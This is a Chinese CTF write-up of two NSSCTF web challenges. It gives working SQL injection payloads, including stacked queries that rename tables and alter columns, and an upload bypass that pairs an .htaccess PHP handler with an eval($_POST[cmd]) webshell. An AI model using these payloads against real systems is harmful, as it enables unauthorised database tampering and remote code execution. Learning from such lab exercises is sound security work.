NSSCTF-Web题目10

目录

[强网杯 2019]随便注

1、题目

2、知识点

3、思路

[GXYCTF 2019]BabyUpload

1、题目

2、知识点

3、思路

[强网杯 2019]随便注

1、题目
2、知识点

数据库注入,堆叠注入,更改表名

3、思路

正常提交查询,看看数据回显

加入单引号'

?inject=1'

加上注释符,数据正常回显,说明当前是单引号的闭合问题

?inject=1' --+

判断当前表的字段数,说明当前表的字段数有2个

?inject=1' order by 3 --+

判断回显位置

?inject=1' and select 1,2 --+

发现select这些字段都被过滤了,采用大小写,双写都绕过不了

根据题目提示,存在堆叠注入,尝试一下

堆叠注入原理:

服务器端没有对执行数据库语句进行限制,导致可以执行多条数据库语句,php中的mysqli_multi_query函数可以执行多条数据库语句

没有对分号(;)进行过滤

改进:

使用mysqli_query()函数

对分号进行过滤

?inject=1';show databases --+

得到数据库名

还有另外一种方法得到当前数据库的名,这里回显了报错信息,所以使用报错注入函数

?inject=1' and extractvalue(1,concat(0x7e,database())) --+

数据库名:supersqli

判断表名

?inject=1';show tables --+

存在两个表: 1919810931114514、words

判断表的字段

这里表名要使用飘号`,而不是单引号'

1、两者在linux下和windows下不同,linux下不区分,windows下区分

2、在windows下引用数据库、表、索引、列和别名是需要用飘号(`)

?inject=1';show columns from `1919810931114514` --+

?inject=1';show columns from `words` --+

通过之前判断表的字段的有两个,结合这里的字段,判断当前的表为words

现在存在一个问题,select字段不能用,表又是words,不能直接获得flag字段的内容

看别人的wp才知道,alter和rename这两个字段没有被过滤,我们可以将words表改成1919810931114514,再改字段名

poc:

1';RENAME TABLE `words` TO `words1`;RENAME TABLE `1919810931114514` TO `words`;ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;show columns from words;--+

RENAME TABLE `words` TO `words1`  先将words表名改成words1

RENAME TABLE `1919810931114514` TO `words` 再将1919810931114514改成words

这样改表名才不会冲突

ALTER TABLE `words` CHANGE `flag` `id` VARCHAR(100) CHARACTER SET utf8 COLLATE utf8_general_ci NOT NULL;

将1919810931114514表原来的flag字段名改成id这个名字,这样我们就可以通过搜索id得到flag

show columns from words 查看改完的结果

使用 1' or '1'='1

使用这样的payload是为了闭合 ' 而且不注释掉原本后面数据库的语句

得到flag:NSSCTF{eeaa7910-f2b4-4d94-831b-f5abd8f7c432}

[GXYCTF 2019]BabyUpload

1、题目

2、知识点

文件上传,.htaccess文件的利用

3、思路

这里我们上传一个正常的文件

发现上传不了,jpg、png、jpeg都尝试过了,上传后都是同一结果

经过我的测试,发现是文件内容太大了

重新上传正常图片

将原本的图片内容删掉,随便输入内容,发现可以上传成功,说明对文件大小做了限制

我们尝试上传php文件

发现对后缀名进行了过滤,也对内容进行了过滤

这里发现php的版本为5.6.23,算是比较旧的

尝试上传一个.htaccess文件,这个文件的作用就是可以执行图片里面的php、javascript代码

.htaccess:

<FilesMatch "flag.jpg"> #这一句的内容作用于后面上传的flag.jpg文件
SetHandler application/x-httpd-php
</FilesMatch>

上传成功

因为前面知道会检测文件的内容,php代码不行,我们可以尝试javascript的代码

flag.jpg:

##一句话木马

<script language='php'>eval($_POST[cmd]);</script>

上传成功,使用蚁剑进行连接

原本的url+upload/2acc77dfba671c79863c87009020349c/flag.jpg

在根目录下找到flag文件

得到flag:NSSCTF{d856bb6b-4b7e-48e2-a246-e3ab923562e2}

这篇文章就写到这里了,哪里不懂的或者不足的欢迎批评指正

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/723368.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

数学建模基础:非线性模型

数学建模基础:非线性模型

目录 前言 一、非线性方程组 二、非线性规划 三、微分方程模型 四、非线性模型的应用 五、实例示范&#xff1a;传染病传播模型 实例总结 五、总结 前言 非线性模型用于描述变量之间的非线性关系&#xff0c;相比线性模型&#xff0c;其数学形式更为复杂&#xff0c;但…
阅读更多...
Window常用的脚本有哪些?快来看看有哪些是你正在用的!(欢迎评论补充~)

Window常用的脚本有哪些?快来看看有哪些是你正在用的!(欢迎评论补充~)

前言 在日常开发中&#xff0c;如果能熟练掌握以下这些使用频率很高的脚本&#xff0c;那工作起来真的是手拿把攥&#xff0c;事半功倍&#xff0c;接下来给大家介绍一些我们日常使用率很高的一些脚本&#xff01; 常用脚本(Batchfile & VBScript) 1.一键启动.bat 一次…
阅读更多...
Android device/xxx/system/common/overlay编译产物

Android device/xxx/system/common/overlay编译产物

MTK 如下代码编译的产物在 framework-res.apk 编译配置文件在device/mediatek/system/common/目录下的Android.bp device/mediatek/system/common/overlay/telephony/frameworks/base/core/res/res/values-mcc655-mnc01/config.xml 在Android U上面还在overlay目录中进行了产…
阅读更多...
pytets测试框架中如果需要运行多个测试套件时pytest.ini文件设置

pytets测试框架中如果需要运行多个测试套件时pytest.ini文件设置

pytets测试框架中如果需要运行多个测试套件时pytest.ini文件设置方法 testpaths testcases/fenmi testcases/weixin testcases/Zgen
阅读更多...
【数据结构与算法】对称矩阵,三角矩阵 详解

【数据结构与算法】对称矩阵,三角矩阵 详解

给出对称矩阵、三角矩阵的节省内存的存贮结构并写出相应的输入、输出算法。 对称矩阵和三角矩阵可以通过特殊的存储结构来节省内存。这种存储结构只存储矩阵的一部分元素&#xff0c;而不是全部元素。 对称矩阵&#xff1a;对于一个n阶对称矩阵&#xff0c;我们只需要存储主对…
阅读更多...
【单片机毕业设计选题24014】-基于Arduino的瓜果采摘机构设计

【单片机毕业设计选题24014】-基于Arduino的瓜果采摘机构设计

系统功能: 使用MeArm机械臂, 上电后四路舵机处于初始90度位置&#xff0c;通过APP"蓝牙调试器"连接手机后可通过手机端控制四路舵机执行单独或连续的动作&#xff0c;并读取颜色传感器的RGB值。 主要功能模块原理图: 资料获取地址 系统主要功能模块代码 //存储电机…
阅读更多...
备忘录文字颜色怎么改 备忘录改变字体颜色方法

备忘录文字颜色怎么改 备忘录改变字体颜色方法

在日常的工作和生活中&#xff0c;备忘录已经成为我不可或缺的好帮手。但是&#xff0c;面对满满当当的备忘录&#xff0c;有时候不同的任务和信息都混在一起&#xff0c;让人眼花缭乱。我常常想&#xff0c;如果能改变备忘录中的文字颜色&#xff0c;用以区分不同类别的事项&a…
阅读更多...
如何打开pak文件-翻译pak语言包

如何打开pak文件-翻译pak语言包

最近碰到一些程序的语言包是pak格式&#xff0c;用Notepad打开全是乱码&#xff0c;百度搜索了一下&#xff0c;pak是一种少见的压缩文件格式&#xff0c;是pak Quake系列游戏所采用的一种特殊压缩包格式&#xff0c;由Quake游戏公司开发&#xff0c;用高版本的winrar可以打开&…
阅读更多...
哪个城市的Delphier最多?Delphier平均年龄多大了?

哪个城市的Delphier最多?Delphier平均年龄多大了?

先来看看哪个城市的Delphier最多&#xff1a; 北上广深不是白叫的&#xff0c; 大家想换工作&#xff0c;就去这些大城市&#xff0c;机会多。 有人会觉得奇怪&#xff0c;怎么才这么几个人&#xff1f; 因为以上数据统计基数为2000人&#xff0c; 根据微信公众号和QQ群得出…
阅读更多...
好用耐用充电宝有哪些牌子?公认性能超全充电宝品牌

好用耐用充电宝有哪些牌子?公认性能超全充电宝品牌

在共享充电宝遍布大街小巷的今天&#xff0c;许多人可能会觉得拥有一款自己的充电宝已经不再必要。然而&#xff0c;共享充电宝的高昂费用和不够便携的特点&#xff0c;让越来越多的消费者开始重新考虑购买一款属于自己的充电宝。那么&#xff0c;在众多充电宝品牌中&#xff0…
阅读更多...
反激开关电源整流桥选型及计算

反激开关电源整流桥选型及计算

整流桥的作用就是把输入交流电压整形成直流电压&#xff0c;把正弦波整成馒头波&#xff0c;由于整流管的单向导电 性&#xff0c;在输入电压瞬时值小于滤波电容上电压时整流桥&#xff0c;在这个时候是不导通的&#xff0c;使整流桥的电流变 成2-3ms左右的窄脉冲。为获得所需…
阅读更多...
python-jupyter notebook安装教程

python-jupyter notebook安装教程

&#x1f308;所属专栏&#xff1a;【python】✨作者主页&#xff1a; Mr.Zwq✔️个人简介&#xff1a;一个正在努力学技术的Python领域创作者&#xff0c;擅长爬虫&#xff0c;逆向&#xff0c;全栈方向&#xff0c;专注基础和实战分享&#xff0c;欢迎咨询&#xff01; 您的…
阅读更多...
深度学习(理论知识)

深度学习(理论知识)

一、监督学习、自监督和半监督 1、监督学习&#xff08;Supervised Learning&#xff09; 概念 监督学习是一种机器学习方法&#xff0c;通过使用带标签的数据进行训练&#xff0c;模型学习从输入到输出的映射关系。数据集中的每个样本都包含输入特征&#xff08;features&am…
阅读更多...
开辟一个存储空间以存放一个结构体数据

开辟一个存储空间以存放一个结构体数据

在软件开发中&#xff0c;常常需要动态地分配和撤销内存空间&#xff0c;例如对动态链表中结点的插入与删除。在C语言中是利用库函数malloc和free来分配和撤销内存空间的。C提供了较简便而功能较强的运算符new和delete 来取代malloc和free函数。注意&#xff1a;new和delete是运…
阅读更多...
使用查表法计算NTC热敏电阻的温度

使用查表法计算NTC热敏电阻的温度

代码&#xff1a; hardware.c /*《AVR专题精选》随书例程2.编程技巧项目&#xff1a;查表法使用NTC测量温度文件&#xff1a;hardware.c说明&#xff1a;硬件驱动文件作者&#xff1a;邵子扬时间&#xff1a;2012年12月12日*/ #include "hardware.h"// IO初始化 vo…
阅读更多...
分享一下,如何搭建个人网站的步骤

分享一下,如何搭建个人网站的步骤

在这段充满探索与创造的奇妙旅途中&#xff0c;我就像一位耐心的建筑师&#xff0c;在数字世界的荒原上精心雕琢&#xff0c;两周的时光缓缓流淌。每天&#xff0c;我与代码共舞&#xff0c;手执HTML、CSS与JavaScript这三大构建魔杖&#xff0c;一砖一瓦地筑起了梦想中的网络城…
阅读更多...
Rcmp: Reconstructing RDMA-Based Memory Disaggregation via CXL——论文阅读

Rcmp: Reconstructing RDMA-Based Memory Disaggregation via CXL——论文阅读

TACO 2024 Paper CXL论文阅读笔记整理 背景 RDMA&#xff1a;RDMA是一系列协议&#xff0c;允许一台机器通过网络直接访问远程机器中的数据。RDMA协议通常固定在RDMA NIC&#xff08;RNIC&#xff09;上&#xff0c;具有高带宽&#xff08;>10 GB/s&#xff09;和微秒级延…
阅读更多...
星戈瑞FITC-Cytochrome C:荧光标记细胞色素C的研究与应用

星戈瑞FITC-Cytochrome C:荧光标记细胞色素C的研究与应用

细胞色素C&#xff08;Cytochrome C&#xff09;是一种位于线粒体内膜上的蛋白质。为了深入地研究细胞色素C在细胞生物学和病理学中的功能&#xff0c;科学家们常常采用荧光标记技术对其进行追踪和观察。其中&#xff0c;异硫氰酸荧光素&#xff08;FITC&#xff09;作为一种常…
阅读更多...
《Deep learning practice》learning notes

《Deep learning practice》learning notes

学习笔记&#xff1a; 【公开课】旷视x北大《深度学习实践》&#xff08;28课时全&#xff09; R Talk | 旷视科技目标检测概述&#xff1a;Beyond RetinaNet and Mask R-CNN 文章目录 Lecture 1: Introduction to Computer Vision and Deep Learning&#xff08;孙剑&#x…
阅读更多...
生信网络学院|06月21日《SolidWorks Costing助力制造企业建立成本核算体系》

生信网络学院|06月21日《SolidWorks Costing助力制造企业建立成本核算体系》

课程主题&#xff1a;SolidWorks Costing助力制造企业建立成本核算体系 课程时间&#xff1a;2024年06月21日 14:00-14:30 主讲人&#xff1a;张丹清 生信科技 售前顾问 Costing成本分析简介钣金件成本分析加工件成本分析装配体成本分析总结&答疑 安装腾讯会议客户端或…
阅读更多...
最新文章

Copyright @ 2022~2023